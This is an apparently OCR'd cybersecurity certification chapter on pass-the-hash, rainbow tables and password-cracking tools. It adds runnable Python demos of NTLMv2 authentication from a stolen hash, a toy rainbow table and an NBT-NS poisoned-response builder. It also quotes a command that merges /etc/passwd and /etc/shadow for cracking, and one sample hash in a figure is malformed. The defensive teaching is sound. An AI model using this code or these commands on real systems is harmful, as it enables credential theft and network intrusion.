Chapter 2 - 04 - Understand Application-level and OS-level Attacks - 10_ocred.pdf
Certified Cybersecurity Technician Information Security Attacks Exam 212-82

Hash Injection/Pass-the-Hash (PtH) Attack

A hash injection/PtH attack allows an attacker to inject a compromised hash into a local session and use that hash to authenticate to network resources.
- The attacker finds and extracts the hash of a logged-on domain admin account.
- The attacker uses the extracted hash to log on to the domain controller.

Figure 2.44: Hash injection attack. A user logs on to a server; the attacker compromises the server using a local or remote exploit, extracts the hash of a logged-on domain admin account (hashes of local accounts live in the server's SAM database, those of logged-on domain accounts in LSASS memory), injects the compromised hash into a local session on the attacker's computer, and uses it to authenticate to the domain controller.

Hash Injection/Pass-the-Hash (PtH) Attack

This type of attack is possible when the target system uses a hash of the password, rather than the password itself, as the secret in its authentication protocol. On a Windows computer, the hashes of local account credentials are stored in the SAM database, the hashes of currently logged-on domain accounts are cached in memory by the LSASS process, and the domain controller holds the hashes of every domain account. In NTLM authentication the server never receives the plaintext password: the client proves possession of the hash by computing a response to a server-supplied challenge, and the server checks that response against the hash it has stored. Whoever holds the hash can therefore produce a valid response without ever knowing the password.

Attackers exploit this property. They first compromise the target server to retrieve the hashes from the SAM database or from LSASS memory.
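What the stolen hash buys the attacker is easiest to see at the protocol level. The following is an added example, not code from the course or from any tool it names: it computes the NT hash, then the NetNTLMv2 challenge-response as specified in MS-NLMP, once from the legitimate user's password and once from nothing but the dumped 16-byte hash, and lets a server-side check accept both. The user name, domain, challenges, timestamp and password are constructed for the demo, and MD4 is implemented inline because many OpenSSL 3 builds of Python no longer provide it.

```python
"""NTLM pass-the-hash, step by step: the NT hash is the only secret the client needs.

Added example; not EC-Council's code. Account, challenges and password are constructed.
"""
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (inline because hashlib.new('md4') is often unavailable)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)              # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, w in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[w] + k) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c      # each step updates the register that was "d"
        state = [(s + v) & _MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """What Windows stores in the SAM/NTDS and caches in LSASS: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def _ntlmv2_key(nt: bytes, user: str, domain: str) -> bytes:
    # MS-NLMP NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, UTF-16LE
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int, av_pairs: bytes = b"") -> bytes:
    """Client side: NtChallengeResponse = NTProofStr || temp (MS-NLMP 3.3.2).
    The input is the NT hash, never the password; that is the whole point of PtH."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    proof = hmac.new(_ntlmv2_key(nt, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def server_verify(nt: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """Server/DC side: recompute NTProofStr from the stored NT hash and compare."""
    proof, temp = response[:16], response[16:]
    expected = hmac.new(_ntlmv2_key(nt, user, domain), server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


# Constructed demo values, not captured traffic
USER, DOMAIN = "jsmith", "CORP"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_CHALLENGE = bytes.fromhex("aabbccddeeff0011")
TIMESTAMP = 0x01D9A2B3C4D5E6F7          # FILETIME; any value works for the demo


def pass_the_hash_demo():
    """Returns (accepted_legit, accepted_attacker, accepted_wrong_hash)."""
    legit_nt = nt_hash("Winter2024!")   # the real user derives this from the password they typed
    legit = ntlmv2_response(legit_nt, USER, DOMAIN, SERVER_CHALLENGE, CLIENT_CHALLENGE, TIMESTAMP)
    dumped_nt = legit_nt                 # attacker holds only these 16 bytes (from a SAM/LSASS dump)
    attacker = ntlmv2_response(dumped_nt, USER, DOMAIN, SERVER_CHALLENGE,
                               bytes.fromhex("1122334455667788"), TIMESTAMP)
    wrong = ntlmv2_response(nt_hash("Summer2024!"), USER, DOMAIN, SERVER_CHALLENGE,
                            CLIENT_CHALLENGE, TIMESTAMP)
    check = lambda r: server_verify(legit_nt, USER, DOMAIN, SERVER_CHALLENGE, r)
    return check(legit), check(attacker), check(wrong)


if __name__ == "__main__":
    print("NT hash of the empty password:", nt_hash("").hex())
    print("legit, attacker, wrong-hash accepted:", pass_the_hash_demo())
```

The empty-password NT hash printed by the demo, 31d6cfe0d16ae931b73c59d7e0c089c0, is the value that appears next to the built-in accounts in the L0phtCrack screenshot later in this module, which is why such accounts are reported as cracked instantly. Note also that the server never distinguishes the attacker's response from the legitimate one: detection has to come from context (logon type, source host, NTLM where Kerberos is expected), not from the protocol.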
They then feed the acquired hashes directly into the authentication mechanism, authenticating with the user's stolen hash instead of the password. Thus, in a hash injection/PtH attack, the attacker injects a compromised LanMan (LM) or NTLM hash into a local session and then uses that hash to authenticate to network resources. Any server or service (running on Windows, UNIX, or any other OS) that accepts NTLM or LM authentication is susceptible to this attack. The attack can be launched from any OS, but Windows is more exposed because of its Single Sign-On (SSO) feature: Windows caches the credential hashes of logged-on users so that one login grants access to all resources, and that cache is precisely what the attacker steals. Defences accordingly target the cached material and the protocol: Credential Guard isolates the secrets held by LSASS, unique local administrator passwords per machine (LAPS) limit how far one stolen hash travels, and disabling NTLM where Kerberos can be used removes the weakest path.

Module 02 Page 270 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Rainbow Table Attack

- Rainbow Table: a precomputed table that contains word lists such as dictionary files and brute-force lists together with their hash values.
- Compare the Hashes: the hash of a password is captured and compared with the precomputed hashes. If a match is found, the password is cracked.
- Easy to Recover: it is easy to recover passwords by comparing captured password hashes with the precomputed table.
(The precomputed hash pairs printed on the slide are reproduced under Figure 2.45.)

Rainbow Table Attack

A rainbow table attack uses the cryptanalytic time-memory trade-off technique: it spends storage up front so that each later lookup takes far less time than a brute-force search. It uses already-calculated information stored on disk or in memory to crack password hashes instead of recomputing the hash of every candidate for each new target. In the rainbow table attack, the attacker creates, in advance, a table covering all the possible passwords of a chosen key space and their respective hash values, known as a rainbow table. Strictly, a rainbow table does not store every hash: it stores only the start and end points of long hash-reduce chains and regenerates the intermediate values during lookup, which is what makes the trade-off between memory and time possible. The technique only works against unsalted hashes such as LM, NTLM, or raw MD5 and SHA-1: a per-user salt puts each hash outside the precomputed space, so a separate table would be needed for every salt.
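To make the time-memory trade-off concrete, here is a complete rainbow table over a toy key space (three characters from a 36-symbol alphabet), added as an example and not taken from the course or from RainbowCrack. The alphabet, chain length, number of chains, salt and target password are constructed so that the whole thing builds and runs in about a second; large tables differ in scale, not in structure. The example also shows the two properties a practitioner should expect: coverage is probabilistic (chains merge, so some passwords are missed), and a salt makes the table useless.

```python
"""Rainbow table (Oechslin's time-memory trade-off) over a toy key space.

Added example, not the course's or RainbowCrack's code. All parameters are constructed.
"""
import hashlib
import random

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
PW_LEN = 3                                  # 36**3 = 46,656 possible passwords
SPACE = len(ALPHABET) ** PW_LEN
CHAIN_LEN = 60                              # hash/reduce steps per chain
N_CHAINS = 3000                             # rows kept: (endpoint -> start) only


def h(pw: str) -> bytes:
    """The unsalted hash being attacked (MD5 here, the 128-bit shape shown in the figure)."""
    return hashlib.md5(pw.encode()).digest()


def reduce_to_password(digest: bytes, column: int) -> str:
    """Map a digest back into the key space. Mixing the column index in is what makes
    this a rainbow table: chains that collide in different columns do not merge."""
    n = (int.from_bytes(digest[:8], "big") + column) % SPACE
    chars = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(ALPHABET))
        chars.append(ALPHABET[r])
    return "".join(chars)


def chain(start: str, chain_len: int = CHAIN_LEN) -> list:
    """Every plaintext on the chain from `start`; the last element is the endpoint."""
    points = [start]
    for col in range(chain_len):
        points.append(reduce_to_password(h(points[-1]), col))
    return points


def build_table(n_chains: int = N_CHAINS, chain_len: int = CHAIN_LEN, seed: int = 1) -> dict:
    """Precomputation: the expensive one-off step. Intermediate hashes are thrown away."""
    rng = random.Random(seed)
    table = {}
    for _ in range(n_chains):
        start = "".join(rng.choice(ALPHABET) for _ in range(PW_LEN))
        table.setdefault(chain(start, chain_len)[-1], start)   # merged chains keep the first start
    return table


def crack(table: dict, target: bytes, chain_len: int = CHAIN_LEN):
    """Online lookup: recover the preimage of `target` from endpoints alone, or None."""
    for col in range(chain_len - 1, -1, -1):
        # Hypothesis: `target` is the hash sitting at column `col` of some stored chain.
        pw = reduce_to_password(target, col)
        for c in range(col + 1, chain_len):
            pw = reduce_to_password(h(pw), c)
        start = table.get(pw)
        if start is None:
            continue
        # An endpoint matched. Regenerate that chain to confirm; endpoint hits can be false alarms.
        for candidate in chain(start, chain_len)[:-1]:
            if h(candidate) == target:
                return candidate
    return None


def coverage(table: dict, samples: int = 50, seed: int = 2) -> float:
    """Fraction of random passwords recovered. Below 1.0 because chains merge and the
    key space is only partly covered; more chains or more tables push it up."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(samples):
        pw = "".join(rng.choice(ALPHABET) for _ in range(PW_LEN))
        hits += crack(table, h(pw)) == pw
    return hits / samples


def demo() -> dict:
    """Constructed scenario: one covered password, looked up unsalted and then salted."""
    table = build_table()
    start = next(iter(table.values()))          # a chain that is definitely stored
    target = chain(start)[25]                   # so this password is definitely covered
    return {
        "target": target,
        "recovered": crack(table, h(target)),
        # A per-user salt moves the hash outside the precomputed space: same table, no hit.
        "salted": crack(table, hashlib.md5(b"8f3a" + target.encode()).digest()),
        "coverage": coverage(table),
    }


if __name__ == "__main__":
    print(demo())
```

The stored table is 3000 rows for a 46,656-entry key space, yet it recovers most passwords; that ratio is the trade-off. A plain lookup table of every hash, which is what the slide's "precomputed table" bullet literally describes, would need all 46,656 rows. Either way, the `salted` result is None, which is the practitioner's takeaway: salted and iterated formats such as sha512crypt or bcrypt are attacked with a wordlist per hash, not with a rainbow table.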
Attackers use tools such as RainbowCrack to perform rainbow table attacks.
- Rainbow Table: A rainbow table is a precomputed table that contains word lists such as dictionary files and brute-force lists and their hash values. It is a lookup table used to recover a plaintext password from its hash. The attacker uses this table to look up captured password hashes and recover the corresponding passwords.
- Computed Hashes: The attacker computes the hash for a list of possible passwords and stores the results in the precomputed table (rainbow table). This is the one-off, expensive step.
- Compare the Hashes: The attacker captures the hash of a password and compares it with the precomputed hash table. If a match is found, the password is cracked. Comparing captured password hashes with a precomputed table is far cheaper than hashing every candidate again for each new hash.

Figure 2.45: Pre-computed hashes (plaintext → hash, as printed in the figure):
1qazwed → 4259cc34599c530b28a6a8f225d668590
hh021da → c744b1716cbf8d4dd0ff4ce31a177151
9da8dasf → 3cd696a8571a843cdad53a229d741843
sodifo8sf → c744b1716cbf8d4dd0ff4ce31a177151
(The figure prints the same hash for hh021da and sodifo8sf; a real hash function would not do that, so read the figure as an illustration of the table's shape, not as actual digests.)

Password-Cracking Tools

- Responder is an LLMNR, NBT-NS, and MDNS poisoner. It responds to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix.
- John the Ripper is an open-source password security auditing and password recovery tool available for many operating systems.
Password-Cracking Tools (Cont'd)

- L0phtCrack: a password auditing and recovery application (https://www.l0phtcrack.com)
- ophcrack (https://ophcrack.sourceforge.io)
- RainbowCrack (http://project-rainbowcrack.com)
- hashcat (https://hashcat.net)
- THC-Hydra (https://github.com)

Password-Cracking Tools

Password-cracking tools recover unknown or lost passwords of Windows local administrator, domain administrator, and other user accounts. In the case of a forgotten password, such a tool can give a user access to a locked computer without reinstalling Windows. Attackers use the same tools to crack the passwords of a target system.

Responder
Source: https://github.com
Responder is an LLMNR, NBT-NS, and MDNS poisoner. It responds to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool only responds to File Server Service requests (name suffix 0x20), which is the lookup used for SMB. When a Windows host fails to resolve a name through DNS and falls back to LLMNR or NBT-NS broadcasts, Responder answers with the attacker's address; the victim then tries to authenticate to the attacker's fake SMB, HTTP or other service, and Responder records the NetNTLMv1/v2 challenge-response hashes. Responder does not crack anything itself: the captured hashes are cracked offline with John the Ripper or hashcat.

Figure 2.46: Screenshot of Responder. The terminal shows Responder 2.3 (author: Laurent Gaffie) started with "sudo ./Responder.py -I ens33", with the LLMNR, NBT-NS and DNS/MDNS poisoners and the HTTP, HTTPS, WPAD proxy, SMB, Kerberos, SQL, FTP, IMAP, POP3, SMTP, DNS and LDAP servers all reported [ON].
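The name-suffix decision described above, as an added example rather than Responder's own code: parse a broadcast NBT-NS name query, read the suffix byte out of the first-level-encoded name, and answer only File Server Service (0x20) lookups with a positive name response pointing at the attacker. The query datagram and transaction IDs are constructed for the demo, the answer-only-0x20 policy mirrors the default the text describes, and the attacker address 10.0.0.66 is a placeholder; sending the answer on UDP/137 is left out so the code runs offline.

```python
"""NBT-NS name-query parsing and the poisoned answer a Responder-style tool sends.

Added example, not Responder's code. Packets, IDs and the attacker address are constructed.
"""
import struct

SUFFIXES = {                      # NetBIOS name suffixes Windows uses
    0x00: "Workstation Service",
    0x03: "Messenger Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
    0x20: "File Server Service",
}
DEFAULT_POLICY = frozenset({0x20})   # only SMB (file server) lookups are answered


def encode_netbios_name(name: str, suffix: int) -> bytes:
    """RFC 1001 first-level encoding: 15-byte space-padded name + suffix byte,
    each nibble written as 'A' + nibble, giving 32 ASCII bytes."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    return b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)


def decode_netbios_name(encoded: bytes):
    """Inverse of encode_netbios_name: returns (name, suffix)."""
    if len(encoded) != 32 or any(not 0x41 <= b <= 0x50 for b in encoded):
        raise ValueError("not a first-level-encoded NetBIOS name")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].rstrip(b" ").decode("ascii"), raw[15]


def build_nbns_query(txid: int, name: str, suffix: int) -> bytes:
    """A broadcast NB name query as a Windows host sends it to UDP/137 (constructed sample)."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)   # flags: query, RD, broadcast
    question = b"\x20" + encode_netbios_name(name, suffix) + b"\x00"
    return header + question + struct.pack(">HH", 0x0020, 0x0001)   # QTYPE=NB, QCLASS=IN


def parse_nbns_query(pkt: bytes):
    """(txid, name, suffix) for a single-question NB name query, else None."""
    if len(pkt) < 50:
        return None
    txid, flags, qdcount = struct.unpack(">HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1 or pkt[12] != 0x20 or pkt[45] != 0x00:
        return None               # a response, multi-question, or scoped name: ignore
    if struct.unpack(">HH", pkt[46:50]) != (0x0020, 0x0001):
        return None               # not an NB/IN question
    name, suffix = decode_netbios_name(pkt[13:45])
    return txid, name, suffix


def build_poisoned_response(txid: int, name: str, suffix: int, attacker_ip: str, ttl: int = 165) -> bytes:
    """Positive name query response: '<name> is a unique B-node name at attacker_ip'."""
    header = struct.pack(">HHHHHH", txid, 0x8500, 0, 1, 0, 0)   # response, authoritative, RD
    rr_name = b"\x20" + encode_netbios_name(name, suffix) + b"\x00"
    rdata = struct.pack(">H", 0x0000) + bytes(int(o) for o in attacker_ip.split("."))  # NB_FLAGS, IP
    return header + rr_name + struct.pack(">HHIH", 0x0020, 0x0001, ttl, len(rdata)) + rdata


def handle_query(pkt: bytes, attacker_ip: str, policy=DEFAULT_POLICY):
    """Per-datagram decision a poisoner makes: answer only suffixes in the policy."""
    parsed = parse_nbns_query(pkt)
    if parsed is None:
        return None
    txid, name, suffix = parsed
    if suffix not in policy:
        return None
    return build_poisoned_response(txid, name, suffix, attacker_ip)


if __name__ == "__main__":
    for name, suffix in (("FILESRV01", 0x20), ("CORP", 0x1C)):
        answer = handle_query(build_nbns_query(0xBEEF, name, suffix), "10.0.0.66")
        print(f"{name}<{suffix:02X}> ({SUFFIXES[suffix]}): {'poisoned' if answer else 'ignored'}")
```

The same parser is useful on the defensive side: a host that sees NB name responses for names it never registered, or responses arriving from a workstation address, is watching a poisoner at work. The durable fix is to disable LLMNR and NBT-NS (and WPAD auto-discovery) so that the fallback broadcast never happens.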
John the Ripper
Source: https://www.openwall.com
John the Ripper is an open-source password security auditing and password recovery tool available for many operating systems. It supports hundreds of hash and cipher types, including those used for user passwords on Unix, macOS and Windows, in web applications, and in groupware and database servers.

Figure 2.47: Screenshot of John the Ripper. The terminal shows the wordlist being prepared with "vim /home/attacker/Desktop/Wordlists/Passwords.txt", the passwd and shadow files being merged with "unshadow /etc/passwd /etc/shadow > target-file", and the attack run with "john --wordlist=/home/attacker/Desktop/Wordlists/Passwords.txt target-file". John reports loading 7 password hashes with 7 different salts (sha512crypt, crypt(3) $6$, cost 1 (iteration count) 5000 for all loaded hashes), runs 2 OpenMP threads, and recovers five passwords: apple (martin), test@123 (shiela), alpha (jason), qwerty@123 (larry) and Z1BGZw (sam). The run ends with "5g 0:00:00:01 DONE (2021-07-13 05:03)" and the reminder to use the "--show" option to display all of the cracked passwords reliably. Because these hashes are salted and iterated, each candidate word has to be hashed once per hash, which is why a wordlist rather than a rainbow table is the right tool here.

L0phtCrack
Source: https://www.l0phtcrack.com
L0phtCrack is a password auditing and recovery application. It recovers lost Microsoft Windows passwords using dictionary, hybrid, rainbow table, and brute-force attacks, and it also reports the strength of each password.
As shown in the screenshot, attackers use L0phtCrack to crack the passwords of target accounts in order to gain access to the system.

Figure 2.48: Screenshot of L0phtCrack 7 (v7.1.5 Win64). The session view lists the imported accounts (Administrator, Guest, DefaultAccount, marcin, jason, shiela and test) with their NTLM hashes and cracking status. The built-in accounts carrying the NTLM hash 31D6CFE0D16AE931B73C59D7E0C089C0 are reported as "Cracked (No Password): instantly" (that value is the NT hash of an empty password), and the user accounts as "Cracked (Dictionary:Complex)".

Some password-cracking tools are listed as follows:
- Ophcrack (https://ophcrack.sourceforge.io)
- RainbowCrack (http://project-rainbowcrack.com)
- hashcat (https://hashcat.net)
- THC-Hydra (https://github.com), an online brute-forcer that tries logins against live network services rather than cracking captured hashes